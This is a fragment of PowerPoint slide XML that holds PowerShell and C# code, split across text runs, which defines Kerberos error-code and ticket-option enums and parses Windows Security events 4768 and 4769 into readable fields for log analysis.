                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_PATH_NOT_ACCEPTED = 0x33,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_ERR_RESPONSE_TOO_BIG = 0x34,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_ERR_GENERIC = 0x3C,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_ERR_FIELD_TOOLONG = 0x3D,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_CLIENT_NOT_TRUSTED = 0x3E,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_KDC_NOT_TRUSTED = 0x3F,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_INVALID_SIG = 0x40,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_KEY_TOO_WEAK = 0x41,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_USER_TO_USER_REQUIRED = 0x42,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_NO_TGT = 0x43,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_WRONG_REALM = 0x44</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[Flags()]</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public</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enum</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TicketOptions</a:t>
            </a:r>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validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00000001,</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renew</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00000002,</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enc_tkt_in_skey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00000008,</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renewable_ok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00000010,</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name_canonicalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00010000,</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cname_in_addl_tkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00020000,</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forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x40000000,</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forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x20000000,</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hw_authent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00100000,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        initial = 0x00400000,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        invalid = 0x01000000,</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may_postdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x04000000,</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ok_as_delegate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00040000,</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postdated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x02000000,</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pre_authent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00200000,</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proxiable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x10000000,</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proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x08000000,</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renewable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0x00800000,</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'@</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Add-Type -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TypeDefinition</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types</a:t>
            </a:r>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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>function</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Expand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-Event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>{</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param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        [Parameter(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mandatory</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ValueFromPipeline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        $Event</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begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> { }</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process</a:t>
            </a:r>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switch ($Event.ID)</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4768</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$Event | Add-Member -Name User -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ('{0}\{1}' -f $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[1].Value, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[0].Value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name IP -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[9].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ServiceName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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[3].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketOptions</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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.TicketOptions</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[5].Value, 10))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ResultCode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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.Errors</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[6].Value, 10))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketEncType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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.EncryptionTypes</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[7].Value, 10))</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4769</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$Event | Add-Member -Name User -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ('{0}\{1}' -f $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[1].Value, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[0].Value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LogonGuid</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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
